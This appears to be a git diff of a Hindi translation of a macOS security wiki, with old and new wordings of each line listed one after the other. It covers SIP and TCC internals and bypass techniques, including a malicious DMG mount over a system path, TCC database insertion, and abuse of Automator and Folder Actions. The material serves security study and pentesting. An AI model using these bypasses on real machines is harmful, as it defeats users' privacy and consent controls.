इस प्रक्रिया की सुरक्षा को खतरा हो सकता है यदि एक हमलावर बूट करने से पहले अपग्रेड इमेज (`InstallESD.dmg`) को बदलता है। रणनीति में एक डायनामिक लोडर (dyld) को एक दुर्भावनापूर्ण संस्करण (`libBaseIA.dylib`) के साथ प्रतिस्थापित करना शामिल है। यह प्रतिस्थापन तब होता है जब इंस्टॉलर शुरू होता है, हमलावर के कोड का निष्पादन होता है।
हमलावर का कोड अपग्रेड प्रक्रिया के दौरान नियंत्रण प्राप्त करता है, इंस्टॉलर पर सिस्टम के विश्वास का लाभ उठाते हुए। हमला `InstallESD.dmg` इमेज को मेथड स्विज़लिंग के माध्यम से बदलने के द्वारा आगे बढ़ता है, विशेष रूप से `extractBootBits` मेथड को लक्षित करता है। यह डिस्क इमेज के उपयोग से पहले दुर्भावनापूर्ण कोड को इंजेक्ट करने की अनुमति देता है।
हमलावर का कोड अपग्रेड प्रक्रिया के दौरान नियंत्रण प्राप्त करता है, इंस्टॉलर पर सिस्टम के विश्वास का लाभ उठाते हुए। हमला `InstallESD.dmg` इमेज को विधि स्विज़लिंग के माध्यम से बदलने के द्वारा आगे बढ़ता है, विशेष रूप से `extractBootBits` विधि को लक्षित करता है। यह डिस्क इमेज के उपयोग से पहले दुर्भावनापूर्ण कोड को इंजेक्ट करने की अनुमति देता है।
इसके अलावा, `InstallESD.dmg` के भीतर, एक `BaseSystem.dmg` है, जो अपग्रेड कोड की रूट फ़ाइल प्रणाली के रूप में कार्य करता है। इसमें एक डायनामिक लाइब्रेरी को इंजेक्ट करने से दुर्भावनापूर्ण कोड को OS-स्तरीय फ़ाइलों को बदलने में सक्षम प्रक्रिया के भीतर कार्य करने की अनुमति मिलती है, जिससे सिस्टम के समझौते की संभावना काफी बढ़ जाती है।
इसके अलावा, `InstallESD.dmg` के भीतर, एक `BaseSystem.dmg` है, जो अपग्रेड कोड की रूट फ़ाइल प्रणाली के रूप में कार्य करता है। इसमें एक डायनामिक लाइब्रेरी इंजेक्ट करने से दुर्भावनापूर्ण कोड को OS-स्तरीय फ़ाइलों को बदलने में सक्षम प्रक्रिया के भीतर कार्य करने की अनुमति मिलती है, जिससे सिस्टम के समझौते की संभावना काफी बढ़ जाती है।
#### [systemmigrationd (2023)](https://www.youtube.com/watch?v=zxZesAN-TEk)
इस [**DEF CON 31**](https://www.youtube.com/watch?v=zxZesAN-TEk) की बात में दिखाया गया है कि **`systemmigrationd`** (जो SIP को बायपास कर सकता है) एक **bash** और एक **perl** स्क्रिप्ट को निष्पादित करता है, जिसे env वेरिएबल **`BASH_ENV`** और **`PERL5OPT`** के माध्यम से दुरुपयोग किया जा सकता है।
[**DEF CON 31**](https://www.youtube.com/watch?v=zxZesAN-TEk) से इस वार्ता में दिखाया गया है कि **`systemmigrationd`** (जो SIP को बायपास कर सकता है) एक **bash** और एक **perl** स्क्रिप्ट को निष्पादित करता है, जिसे env वेरिएबल **`BASH_ENV`** और **`PERL5OPT`** के माध्यम से दुरुपयोग किया जा सकता है।
#### CVE-2023-42860 <a href="#cve-a-detailed-look" id="cve-a-detailed-look"></a>
@ -240,16 +240,16 @@ hdiutil attach -mountpoint /System/Library/Snadbox/ evil.dmg
| FileVault: Yes (Unlocked)
</code></pre>
पिछले आउटपुट में यह देखा जा सकता है कि **उपयोगकर्ता-सुलभ स्थान** `/System/Volumes/Data` के तहत माउंट किए गए हैं।
पिछले आउटपुट में यह देखना संभव है कि **उपयोगकर्ता-सुलभ स्थान** `/System/Volumes/Data` के तहत माउंट किए गए हैं।
इसके अलावा, **macOS सिस्टम वॉल्यूम स्नैपशॉट** `/` में माउंट किया गया है और यह **सील** है (OS द्वारा क्रिप्टोग्राफिक रूप से हस्ताक्षरित)। इसलिए, यदि SIP को बायपास किया जाता है और इसे संशोधित किया जाता है, तो **OS अब बूट नहीं होगा**
यह भी संभव है कि **सत्यापित करें कि सील सक्षम है** चलाकर:
यह भी संभव है कि **सत्यापित करें कि सील सक्षम है**:
```bash
csrutil authenticated-root status
Authenticated Root status: enabled
```
इसके अलावा, स्नैपशॉट डिस्क को **केवल पढ़ने के लिए** माउंट किया गया है:
इसके अलावा, स्नैपशॉट डिस्क को **केवल-पढ़ने** के रूप में भी माउंट किया गया है:
```bash
mount
/dev/disk3s1s1 on / (apfs, sealed, local, read-only, journaled)

52
src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/README.md
View File

@ -6,13 +6,13 @@
**TCC (Transparency, Consent, and Control)** एक सुरक्षा प्रोटोकॉल है जो एप्लिकेशन अनुमतियों को विनियमित करने पर केंद्रित है। इसकी प्राथमिक भूमिका संवेदनशील सुविधाओं जैसे **स्थान सेवाएँ, संपर्क, फ़ोटो, माइक्रोफ़ोन, कैमरा, पहुँच, और पूर्ण डिस्क एक्सेस** की सुरक्षा करना है। TCC उपयोगकर्ता की स्पष्ट सहमति को अनिवार्य करके इन तत्वों तक ऐप की पहुँच प्रदान करने से पहले, गोपनीयता और उपयोगकर्ता के डेटा पर नियंत्रण को बढ़ाता है।
उपयोगकर्ता तब TCC का सामना करते हैं जब एप्लिकेशन संरक्षित सुविधाओं तक पहुँच का अनुरोध करते हैं। यह एक प्रॉम्प्ट के माध्यम से दिखाई देता है जो उपयोगकर्ताओं को **पहुँच को स्वीकृत या अस्वीकृत** करने की अनुमति देता है। इसके अलावा, TCC सीधे उपयोगकर्ता क्रियाओं को समायोजित करता है, जैसे कि **फाइलों को एक एप्लिकेशन में खींचना और छोड़ना**, ताकि विशिष्ट फ़ाइलों तक पहुँच प्रदान की जा सके, यह सुनिश्चित करते हुए कि एप्लिकेशन केवल वही पहुँच प्राप्त करें जो स्पष्ट रूप से अनुमत है।
उपयोगकर्ता तब TCC का सामना करते हैं जब एप्लिकेशन संरक्षित सुविधाओं तक पहुँच का अनुरोध करते हैं। यह एक प्रॉम्प्ट के माध्यम से दिखाई देता है जो उपयोगकर्ताओं को **पहुँच को स्वीकृत या अस्वीकृत** करने की अनुमति देता है। इसके अलावा, TCC सीधे उपयोगकर्ता क्रियाओं को समायोजित करता है, जैसे कि **फाइलों को एक एप्लिकेशन में खींचना और छोड़ना**, ताकि विशिष्ट फ़ाइलों तक पहुँच प्रदान की जा सके, यह सुनिश्चित करते हुए कि एप्लिकेशन केवल वही एक्सेस करें जो स्पष्ट रूप से अनुमत है।
![An example of a TCC prompt](https://rainforest.engineering/images/posts/macos-tcc/tcc-prompt.png?1620047855)
**TCC** को **daemon** द्वारा संभाला जाता है जो `/System/Library/PrivateFrameworks/TCC.framework/Support/tccd` में स्थित है और `/System/Library/LaunchDaemons/com.apple.tccd.system.plist` में कॉन्फ़िगर किया गया है (mach सेवा `com.apple.tccd.system` को पंजीकृत करना)।
एक **उपयोगकर्ता-मोड tccd** प्रत्येक लॉग इन उपयोगकर्ता के लिए चला है जो `/System/Library/LaunchAgents/com.apple.tccd.plist` में परिभाषित है, जो mach सेवाओं `com.apple.tccd` और `com.apple.usernotifications.delegate.com.apple.tccd` को पंजीकृत करता है।
एक **उपयोगकर्ता-मोड tccd** प्रत्येक लॉग इन उपयोगकर्ता के लिए चल रहा है जो `/System/Library/LaunchAgents/com.apple.tccd.plist` में परिभाषित है, जो mach सेवाओं `com.apple.tccd` और `com.apple.usernotifications.delegate.com.apple.tccd` को पंजीकृत करता है।
यहाँ आप tccd को सिस्टम और उपयोगकर्ता के रूप में चलते हुए देख सकते हैं:
```bash
@ -32,9 +32,9 @@ ps -ef | grep tcc
- यह डेटाबेस संरक्षित है इसलिए केवल उच्च TCC विशेषाधिकार वाले प्रक्रियाएँ जैसे कि पूर्ण डिस्क एक्सेस इसमें लिख सकती हैं (लेकिन यह SIP द्वारा संरक्षित नहीं है)।
> [!WARNING]
> पिछले डेटाबेस भी **पढ़ने के लिए TCC संरक्षित** हैं। इसलिए आप **अपनी नियमित उपयोगकर्ता TCC डेटाबेस नहीं पढ़ पाएंगे** जब तक कि यह एक TCC विशेषाधिकार प्राप्त प्रक्रिया से न हो।
> पिछले डेटाबेस भी **पढ़ने के लिए TCC संरक्षित** हैं। इसलिए आप **अपनी नियमित उपयोगकर्ता TCC डेटाबेस नहीं पढ़ पाएंगे** जब तक कि यह TCC विशेषाधिकार प्राप्त प्रक्रिया से न हो।
>
> हालाँकि, याद रखें कि इन उच्च विशेषाधिकार वाली प्रक्रिया (जैसे **FDA** या **`kTCCServiceEndpointSecurityClient`**) के पास उपयोगकर्ता TCC डेटाबेस में लिखने की क्षमता होगी।
> हालाँकि, याद रखें कि इन उच्च विशेषाधिकार वाली प्रक्रिया (जैसे **FDA** या **`kTCCServiceEndpointSecurityClient`**) के पास उपयोगकर्ताओं के TCC डेटाबेस में लिखने की क्षमता होगी।
- एक **तीसरा** TCC डेटाबेस **`/var/db/locationd/clients.plist`** में है जो उन क्लाइंट्स को इंगित करता है जिन्हें **स्थान सेवाओं** तक पहुँचने की अनुमति है।
- SIP संरक्षित फ़ाइल **`/Users/carlospolop/Downloads/REG.db`** (जो TCC के साथ पढ़ने की पहुँच से भी संरक्षित है), सभी **मान्य TCC डेटाबेस** का **स्थान** रखती है।
@ -56,7 +56,7 @@ ps -ef | grep tcc
>
> हालाँकि, उपयोगकर्ता **`tccutil`** कमांड लाइन उपयोगिता के साथ **नियमों को हटा या क्वेरी** कर सकते हैं।
#### डेटाबेस क्वेरी करें
#### डेटाबेस को क्वेरी करें
{{#tabs}}
{{#tab name="user DB"}}
@ -105,7 +105,7 @@ sqlite> select * from access where client LIKE "%telegram%" and auth_value=0;
> दोनों डेटाबेस की जांच करके आप यह देख सकते हैं कि किसी ऐप को कौन सी अनुमतियाँ दी गई हैं, कौन सी मना की गई हैं, या कौन सी नहीं हैं (यह इसके लिए पूछेगा)।
- **`service`** TCC **अनुमति** का स्ट्रिंग प्रतिनिधित्व है
- **`client`** **बंडल ID** या **बाइनरी का पथ** है जिसमें अनुमतियाँ हैं
- **`client`** **बंडल आईडी** या **बाइनरी का पथ** है जिसमें अनुमतियाँ हैं
- **`client_type`** यह दर्शाता है कि यह बंडल पहचानकर्ता(0) है या पूर्ण पथ(1)
<details>
@ -169,7 +169,7 @@ echo "$REQ_STR" | csreq -r- -b /tmp/csreq.bin
REQ_HEX=$(xxd -p /tmp/csreq.bin | tr -d '\n')
echo "X'$REQ_HEX'"
```
- अधिक जानकारी के लिए **अन्य क्षेत्रों** के बारे में [**इस ब्लॉग पोस्ट**](https://www.rainforestqa.com/blog/macos-tcc-db-deep-dive) को देखें।
- तालिका के **अन्य क्षेत्रों** के बारे में अधिक जानकारी के लिए [**इस ब्लॉग पोस्ट**](https://www.rainforestqa.com/blog/macos-tcc-db-deep-dive) की जांच करें।
आप `System Preferences --> Security & Privacy --> Privacy --> Files and Folders` में ऐप्स को **पहले से दिए गए अनुमतियों** की भी जांच कर सकते हैं।
@ -206,9 +206,9 @@ csreq -t -r /tmp/telegram_csreq.bin
ऐप्स **केवल आवश्यकता नहीं है** कि वे **अनुरोध करें** और कुछ संसाधनों तक **पहुँच प्राप्त करें**, उन्हें **संबंधित अधिकार भी होने चाहिए।**\
उदाहरण के लिए, **Telegram** के पास **कैमरे तक पहुँच** के लिए `com.apple.security.device.camera` का अधिकार है। एक **ऐप** जो **इस अधिकार** के बिना है, वह कैमरे तक **पहुँच नहीं प्राप्त कर सकेगा** (और उपयोगकर्ता से अनुमतियों के लिए भी नहीं पूछा जाएगा)।
हालांकि, ऐप्स को **कुछ उपयोगकर्ता फ़ोल्डरों** तक **पहुँच** के लिए, जैसे `~/Desktop`, `~/Downloads` और `~/Documents`, उन्हें किसी विशेष **अधिकार** की आवश्यकता नहीं है। सिस्टम पारदर्शी रूप से पहुँच को संभालेगा और **उपयोगकर्ता को** आवश्यकतानुसार **प्रेरित करेगा**
हालांकि, ऐप्स को **कुछ उपयोगकर्ता फ़ोल्डरों** जैसे `~/Desktop`, `~/Downloads` और `~/Documents` तक **पहुँच** के लिए किसी विशेष **अधिकार** की आवश्यकता नहीं है। सिस्टम पारदर्शी रूप से पहुँच को संभालेगा और **उपयोगकर्ता को** आवश्यकतानुसार **प्रेरित करेगा**
Apple के ऐप्स **प्रेरणाएँ उत्पन्न नहीं करेंगे।** उनके **अधिकार** सूची में **पूर्व-प्राप्त अधिकार** होते हैं, जिसका अर्थ है कि वे **कभी भी पॉपअप उत्पन्न नहीं करेंगे**, **न ही** वे किसी भी **TCC डेटाबेस** में दिखाई देंगे। उदाहरण के लिए:
Apple के ऐप्स **प्रेरणाएँ उत्पन्न नहीं करेंगे।** उनके **अधिकार** सूची में **पूर्व-प्रदान किए गए अधिकार** होते हैं, जिसका अर्थ है कि वे **कभी भी पॉपअप उत्पन्न नहीं करेंगे**, **न ही** वे किसी भी **TCC डेटाबेस** में दिखाई देंगे। उदाहरण के लिए:
```bash
codesign -dv --entitlements :- /System/Applications/Calendar.app
[...]
@ -222,7 +222,7 @@ codesign -dv --entitlements :- /System/Applications/Calendar.app
यह कैलेंडर को उपयोगकर्ता से अनुस्मारक, कैलेंडर और पते की पुस्तक तक पहुँचने के लिए पूछने से रोकेगा।
> [!TIP]
> अधिकारों के बारे में कुछ आधिकारिक दस्तावेज़ों के अलावा, **https://newosxbook.com/ent.jl** में अधिकारों के बारे में कुछ अनौपचारिक **दिलचस्प जानकारी मिलना भी संभव है।**
> अधिकारों के बारे में कुछ आधिकारिक दस्तावेज़ों के अलावा, **https://newosxbook.com/ent.jl** पर अधिकारों के बारे में कुछ अनौपचारिक **दिलचस्प जानकारी मिलना भी संभव है।**
कुछ TCC अनुमतियाँ हैं: kTCCServiceAppleEvents, kTCCServiceCalendar, kTCCServicePhotos... इनमें से सभी को परिभाषित करने वाली कोई सार्वजनिक सूची नहीं है, लेकिन आप इस [**ज्ञात की सूची**](https://www.rainforestqa.com/blog/macos-tcc-db-deep-dive#service) की जांच कर सकते हैं।
@ -234,7 +234,7 @@ codesign -dv --entitlements :- /System/Applications/Calendar.app
### उपयोगकर्ता इरादा / com.apple.macl
जैसा कि पहले उल्लेख किया गया है, **एक फ़ाइल के लिए एक ऐप को पहुँच देने के लिए इसे खींचकर और छोड़कर** अनुमति दी जा सकती है। यह पहुँच किसी भी TCC डेटाबेस में निर्दिष्ट नहीं होगी, बल्कि फ़ाइल के **विस्तारित** **गुण के रूप में होगी**। यह गुण **अनुमत ऐप का UUID** संग्रहीत करेगा:
जैसा कि पहले उल्लेख किया गया है, **एक फ़ाइल के लिए एक ऐप को पहुँच प्रदान करना संभव है, इसे खींचकर और छोड़कर**। यह पहुँच किसी भी TCC डेटाबेस में निर्दिष्ट नहीं होगी, बल्कि फ़ाइल के **विस्तारित** **गुण के रूप में होगी**। यह गुण **अनुमत ऐप का UUID** संग्रहीत करेगा:
```bash
xattr Desktop/private.txt
com.apple.macl
@ -252,15 +252,15 @@ uuid 769FD8F1-90E0-3206-808C-A8947BEBD6C3
> [!NOTE]
> यह दिलचस्प है कि **`com.apple.macl`** विशेषता **Sandbox** द्वारा प्रबंधित की जाती है, न कि tccd द्वारा।
>
> यह भी ध्यान दें कि यदि आप एक फ़ाइल को अपने कंप्यूटर में एक ऐप के UUID के साथ किसी अन्य कंप्यूटर में ले जाते हैं, तो क्योंकि उसी ऐप के अलग-अलग UIDs होंगे, यह उस ऐप को एक्सेस नहीं देगा।
> यह भी ध्यान दें कि यदि आप एक फ़ाइल को अपने कंप्यूटर में एक ऐप के UUID के साथ किसी अन्य कंप्यूटर में ले जाते हैं, तो क्योंकि उसी ऐप के अलग-अलग UIDs होंगे, यह ऐप को एक्सेस नहीं देगा।
विस्तारित विशेषता `com.apple.macl` **अन्य विस्तारित विशेषताओं** की तरह **हटाई नहीं जा सकती** क्योंकि यह **SIP द्वारा संरक्षित** है। हालाँकि, जैसे कि [**इस पोस्ट में समझाया गया है**](https://www.brunerd.com/blog/2020/01/07/track-and-tackle-com-apple-macl/), इसे **ज़िप** करके, **हटाकर** और **अनज़िप** करके अक्षम करना संभव है।
विस्तारित विशेषता `com.apple.macl` **अन्य विस्तारित विशेषताओं की तरह** **हटाई नहीं जा सकती** क्योंकि यह **SIP द्वारा संरक्षित है**। हालाँकि, जैसे कि [**इस पोस्ट में समझाया गया है**](https://www.brunerd.com/blog/2020/01/07/track-and-tackle-com-apple-macl/), इसे **ज़िप** करके, **हटाकर** और **अनज़िप** करके अक्षम करना संभव है।
## TCC Privesc & Bypasses
### TCC में डालें
यदि किसी बिंदु पर आप TCC डेटाबेस पर लिखने की अनुमति प्राप्त कर लेते हैं, तो आप निम्नलिखित का उपयोग करके एक प्रविष्टि जोड़ सकते हैं (टिप्पणियाँ हटा दें):
यदि किसी बिंदु पर आप TCC डेटाबेस पर लिखने की पहुंच प्राप्त करने में सफल होते हैं, तो आप निम्नलिखित का उपयोग करके एक प्रविष्टि जोड़ सकते हैं (टिप्पणियाँ हटा दें):
<details>
@ -361,16 +361,16 @@ EOD
आप इसका दुरुपयोग करके **अप DATABASE TCC लिख सकते हैं**
> [!WARNING]
> इस अनुमति के साथ आप **फाइंडर से TCC प्रतिबंधित फ़ोल्डरों तक पहुँचने के लिए पूछ सकते हैं** और आपको फ़ाइलें मिलेंगी, लेकिन afaik आप **फाइंडर को मनमाना कोड निष्पादित करने के लिए मजबूर नहीं कर पाएंगे** ताकि आप उसकी FDA पहुँच का पूरी तरह से दुरुपयोग कर सकें।
> इस अनुमति के साथ आप **फाइंडर से TCC प्रतिबंधित फ़ोल्डरों तक पहुँचने के लिए कह सकते हैं** और आपको फ़ाइलें मिलेंगी, लेकिन afaik आप **फाइंडर को मनमाना कोड निष्पादित करने के लिए मजबूर नहीं कर पाएंगे** ताकि आप उसकी FDA पहुँच का पूरी तरह से दुरुपयोग कर सकें।
>
> इसलिए, आप FDA की पूरी क्षमताओं का दुरुपयोग नहीं कर पाएंगे।
> इसलिए, आप पूरी FDA क्षमताओं का दुरुपयोग नहीं कर पाएंगे।
यह फाइंडर पर स्वचालन विशेषाधिकार प्राप्त करने के लिए TCC प्रॉम्प्ट है:
<figure><img src="../../../../images/image (27).png" alt="" width="244"><figcaption></figcaption></figure>
> [!CAUTION]
> ध्यान दें कि क्योंकि **Automator** ऐप के पास TCC अनुमति **`kTCCServiceAppleEvents`** है, यह **किसी भी ऐप को नियंत्रित कर सकता है**, जैसे फाइंडर। इसलिए, Automator को नियंत्रित करने की अनुमति होने पर आप नीचे दिए गए कोड के साथ **फाइंडर** को भी नियंत्रित कर सकते हैं:
> ध्यान दें कि क्योंकि **Automator** ऐप के पास TCC अनुमति **`kTCCServiceAppleEvents`** है, यह **किसी भी ऐप को नियंत्रित कर सकता है**, जैसे फाइंडर। इसलिए Automator को नियंत्रित करने की अनुमति होने पर आप नीचे दिए गए कोड की तरह **फाइंडर** को भी नियंत्रित कर सकते हैं:
<details>
@ -400,7 +400,7 @@ EOD
### स्वचालन (SE) से कुछ TCC
**सिस्टम इवेंट्स फ़ोल्डर क्रियाएँ बना सकते हैं, और फ़ोल्डर क्रियाएँ कुछ TCC फ़ोल्डरों (डेस्कटॉप, दस्तावेज़ और डाउनलोड) तक पहुँच सकती हैं,** इसलिए निम्नलिखित स्क्रिप्ट का उपयोग इस व्यवहार का दुरुपयोग करने के लिए किया जा सकता है:
**सिस्टम इवेंट्स फ़ोल्डर क्रियाएँ बना सकते हैं, और फ़ोल्डर क्रियाएँ कुछ TCC फ़ोल्डरों (डेस्कटॉप, दस्तावेज़ और डाउनलोड) तक पहुँच सकती हैं**, इसलिए निम्नलिखित स्क्रिप्ट का उपयोग इस व्यवहार का दुरुपयोग करने के लिए किया जा सकता है:
```bash
# Create script to execute with the action
cat > "/tmp/script.js" <<EOD
@ -492,19 +492,19 @@ keystroke "v" using {command down}
end tell
EOF
```
### `kTCCServiceAccessibility` को FDA\*
### `kTCCServiceAccessibility` to FDA\*
इस पृष्ठ पर कुछ [**पेलोड्स की जांच करें जो एक्सेसिबिलिटी अनुमतियों का दुरुपयोग करते हैं**](macos-tcc-payloads.md#accessibility) ताकि FDA\* के लिए प्रिवेस्क या उदाहरण के लिए कीलॉगर चलाया जा सके।
### **एंडपॉइंट सुरक्षा क्लाइंट को FDA**
### **एंडपॉइंट सुरक्षा क्लाइंट से FDA**
यदि आपके पास **`kTCCServiceEndpointSecurityClient`** है, तो आपके पास FDA है। समाप्त।
### सिस्टम नीति SysAdmin फ़ाइल को FDA
### सिस्टम नीति SysAdmin फ़ाइल से FDA
**`kTCCServiceSystemPolicySysAdminFiles`** एक उपयोगकर्ता के **`NFSHomeDirectory`** विशेषता को **बदलने** की अनुमति देता है, जो उसके होम फ़ोल्डर को बदलता है और इसलिए **TCC को बायपास** करने की अनुमति देता है।
### उपयोगकर्ता TCC DB को FDA
### उपयोगकर्ता TCC DB से FDA
**उपयोगकर्ता TCC** डेटाबेस पर **लिखने की अनुमतियाँ** प्राप्त करने पर आप **`FDA`** अनुमतियाँ नहीं दे सकते, केवल वही जो सिस्टम डेटाबेस में रहता है वह इसे दे सकता है।
@ -514,18 +514,18 @@ EOF
**पूर्ण डिस्क एक्सेस** का TCC नाम **`kTCCServiceSystemPolicyAllFiles`** है।
मुझे नहीं लगता कि यह एक वास्तविक प्रिवेस्क है, लेकिन अगर आपको यह उपयोगी लगता है: यदि आप FDA के साथ एक प्रोग्राम को नियंत्रित करते हैं तो आप **उपयोगकर्ताओं के TCC डेटाबेस को संशोधित कर सकते हैं और अपने लिए कोई भी एक्सेस दे सकते हैं**। यह एक स्थायी तकनीक के रूप में उपयोगी हो सकता है यदि आप अपनी FDA अनुमतियाँ खो देते हैं।
मुझे नहीं लगता कि यह एक वास्तविक प्रिवेस्क है, लेकिन अगर आपको यह उपयोगी लगता है: यदि आप FDA के साथ एक प्रोग्राम को नियंत्रित करते हैं, तो आप **उपयोगकर्ताओं के TCC डेटाबेस को संशोधित कर सकते हैं और अपने लिए कोई भी एक्सेस दे सकते हैं**। यह एक स्थायी तकनीक के रूप में उपयोगी हो सकता है यदि आप अपनी FDA अनुमतियाँ खो देते हैं।
### **SIP बायपास से TCC बायपास**
सिस्टम **TCC डेटाबेस** **SIP** द्वारा सरक्षित है, यही कारण है कि केवल **निर्दिष्ट अधिकारों वाले प्रक्रियाएँ इसे संशोधित करने में सक्षम होंगी**। इसलिए, यदि एक हमलावर एक **SIP बायपास** एक **फाइल** पर पाता है (SIP द्वारा प्रतिबंधित फ़ाइल को संशोधित करने में सक्षम होना), तो वह:
सिस्टम **TCC डेटाबेस** **SIP** द्वारा सरक्षित है, यही कारण है कि केवल प्रक्रियाएँ जिनके पास **निर्दिष्ट अधिकार हैं, उन्हें संशोधित करने में सक्षम होंगी**। इसलिए, यदि एक हमलावर एक **SIP बायपास** एक **फाइल** पर पाता है (SIP द्वारा प्रतिबंधित फ़ाइल को संशोधित करने में सक्षम होना), तो वह सक्षम होगा:
- **TCC डेटाबेस की सुरक्षा को हटा सकता है**, और अपने लिए सभी TCC अनुमतियाँ दे सकता है। वह उदाहरण के लिए इन फ़ाइलों में से किसी का दुरुपयोग कर सकता है:
- **TCC डेटाबेस की सुरक्षा को हटा दें**, और अपने लिए सभी TCC अनुमतियाँ दें। वह उदाहरण के लिए इन फ़ाइलों में से किसी का दुरुपयोग कर सकता है:
- TCC सिस्टम डेटाबेस
- REG.db
- MDMOverrides.plist
हालांकि, इस **SIP बायपास से TCC बायपास** करने का एक और विकल्प है, फ़ाइल `/Library/Apple/Library/Bundles/TCC_Compatibility.bundle/Contents/Resources/AllowApplicationsList.plist` उन अनुप्रयोगों की अनुमति सूची है जिन्हें TCC अपवाद की आवश्यकता होती है। इसलिए, यदि एक हमलावर इस फ़ाइल से **SIP सुरक्षा को हटा सकता है** और अपना **स्वयं का अनुप्रयोग** जोड़ता है, तो अनुप्रयोग TCC को बायपास करने में सक्षम होगा।\
हालांकि, इस **SIP बायपास का TCC को बायपास करने के लिए** दुरुपयोग करने का एक और विकल्प है, फ़ाइल `/Library/Apple/Library/Bundles/TCC_Compatibility.bundle/Contents/Resources/AllowApplicationsList.plist` उन अनुप्रयोगों की अनुमति सूची है जिन्हें TCC अपवाद की आवश्यकता होती है। इसलिए, यदि एक हमलावर इस फ़ाइल से **SIP सुरक्षा को हटा सकता है** और अपना **स्वयं का अनुप्रयोग** जोड़ सकता है, तो अनुप्रयोग TCC को बायपास करने में सक्षम होगा।\
उदाहरण के लिए टर्मिनल जोड़ने के लिए:
```bash
# Get needed info

6
src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-apple-events.md
View File

@ -6,11 +6,11 @@
**Apple Events** एप्पल के macOS में एक विशेषता है जो अनुप्रयोगों को एक-दूसरे के साथ संवाद करने की अनुमति देती है। ये **Apple Event Manager** का हिस्सा हैं, जो macOS ऑपरेटिंग सिस्टम का एक घटक है जो इंटरप्रोसेस संचार को संभालने के लिए जिम्मेदार है। यह प्रणाली एक अनुप्रयोग को दूसरे अनुप्रयोग को एक संदेश भेजने की अनुमति देती है ताकि वह एक विशेष ऑपरेशन कर सके, जैसे कि एक फ़ाइल खोलना, डेटा प्राप्त करना, या एक आदेश निष्पादित करना।
mina daemon `/System/Library/CoreServices/appleeventsd` है जो सेवा `com.apple.coreservices.appleevents` को पंजीकृत करता है।
मिना डेमन `/System/Library/CoreServices/appleeventsd` है जो सेवा `com.apple.coreservices.appleevents` को पंजीकृत करता है।
हर अनुप्रयोग जो घटनाएँ प्राप्त कर सकता है, इस daemon के साथ अपनी Apple Event Mach Port की जांच करेगा। और जब एक ऐप इसे एक घटना भेजना चाहता है, तो ऐप इस पोर्ट को daemon से अनुरोध करेगा।
हर अनुप्रयोग जो घटनाएँ प्राप्त कर सकता है, इस डेमन के साथ अपनी Apple Event Mach Port की जांच करेगा। और जब एक ऐप इसे एक घटना भेजना चाहता है, तो ऐप इस पोर्ट को डेमन से अनुरोध करेगा।
Sandboxed अनुप्रयोगों को घटनाएँ भेजने के लिए `allow appleevent-send` और `(allow mach-lookup (global-name "com.apple.coreservices.appleevents))` जैसी विशेषाधिकारों की आवश्यकता होती है। ध्यान दें कि `com.apple.security.temporary-exception.apple-events` जैसी अनुमतियाँ उन लोगों को प्रतिबंधित कर सकत हैं जिनके पास घटनाएँ भेजने की अनुमति है, जिसके लिए `com.apple.private.appleevents` जैसी अनुमतियों की आवश्यकता होगी।
सैंडबॉक्स किए गए अनुप्रयोगों को घटनाएँ भेजने के लिए `allow appleevent-send` और `(allow mach-lookup (global-name "com.apple.coreservices.appleevents))` जैसी विशेषाधिकारों की आवश्यकता होती है। ध्यान दें कि विशेषाधिकार जैसे `com.apple.security.temporary-exception.apple-events` उन लोगों को प्रतिबंधित कर सकत हैं जिनके पास घटनाएँ भेजने की अनुमति है, जिसके लिए `com.apple.private.appleevents` जैसी विशेषाधिकारों की आवश्यकता होगी।
> [!TIP]
> संदेश भेजने के बारे में जानकारी लॉग करने के लिए env वेरिएबल **`AEDebugSends`** का उपयोग करना संभव है:

114
src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/README.md
View File

@ -6,7 +6,7 @@
### लिखने का बायपास
यह एक बायपास नहीं है, यह बस TCC कैसे काम करता है: **यह लिखने से सुरक्षा नहीं करता**। यदि Terminal **को एक उपयोगकर्ता के डेस्कटॉप को पढ़ने की अनुमति नहीं है, तो भी यह उसमें लिख सकता है**:
यह एक बायपास नहीं है, यह बस TCC कैसे काम करता है: **यह लिखने से सुरक्षा नहीं करता**। यदि Terminal **को एक उपयोगकर्ता के डेस्कटॉप को पढ़ने की अनुमति नहीं है, तो यह अभी भी उसमें लिख सकता है**:
```shell-session
username@hostname ~ % ls Desktop
ls: Desktop: Operation not permitted
@ -26,8 +26,8 @@ asd
### TCC अनुरोध किसी भी नाम से
हमलावर **किसी भी नाम के साथ ऐप्स बना सकता है** (जैसे Finder, Google Chrome...) **`Info.plist`** में और इसे कुछ TCC संरक्षित स्थानों तक पहुँच के लिए अनुरोध करने के लिए बना सकता है। उपयोगकर्ता सोचेगा कि वैध एप्लिकेशन ही इस पहुँच के लिए अनुरोध कर रहा है।\
इसके अलावा, यह संभव है कि **Dock से वैध ऐप को हटा दें और फर्जी को उस पर रखें**, ताकि जब उपयोगकर्ता फर्जी पर क्लिक करे (जो उसी आइकन का उपयोग कर सकता है) तो यह वैध को कॉल कर सके, TCC अनुमतियों के लिए पूछ सके और एक मैलवेयर निष्पादित कर सके, जिससे उपयोगकर्ता को विश्वास हो कि वैध ऐप ने पहुँच का अनुरोध किया।
हमलावर **किसी भी नाम के साथ ऐप्स बना सकता है** (जैसे Finder, Google Chrome...) **`Info.plist`** में और इसे कुछ TCC संरक्षित स्थानों तक पहुँचने के लिए अनुरोध करवा सकता है। उपयोगकर्ता सोचेगा कि वैध एप्लिकेशन ही इस पहुँच के लिए अनुरोध कर रहा है।\
इसके अलावा, यह संभव है कि **Dock से वैध ऐप को हटा दें और फर्जी ऐप को उस पर रखें**, ताकि जब उपयोगकर्ता फर्जी ऐप पर क्लिक करे (जो उसी आइकन का उपयोग कर सकता है) तो यह वैध ऐप को कॉल कर सके, TCC अनुमतियों के लिए पूछ सके और एक मैलवेयर निष्पादित कर सके, जिससे उपयोगकर्ता को विश्वास हो कि वैध ऐप ने पहुँच का अनुरोध किया।
<figure><img src="https://lh7-us.googleusercontent.com/Sh-Z9qekS_fgIqnhPVSvBRmGpCXCpyuVuTw0x5DLAIxc2MZsSlzBOP7QFeGo_fjMeCJJBNh82f7RnewW1aWo8r--JEx9Pp29S17zdDmiyGgps1hH9AGR8v240m5jJM8k0hovp7lm8ZOrbzv-RC8NwzbB8w=s2048" alt="" width="375"><figcaption></figcaption></figure>
@ -39,22 +39,22 @@ asd
### SSH बायपास
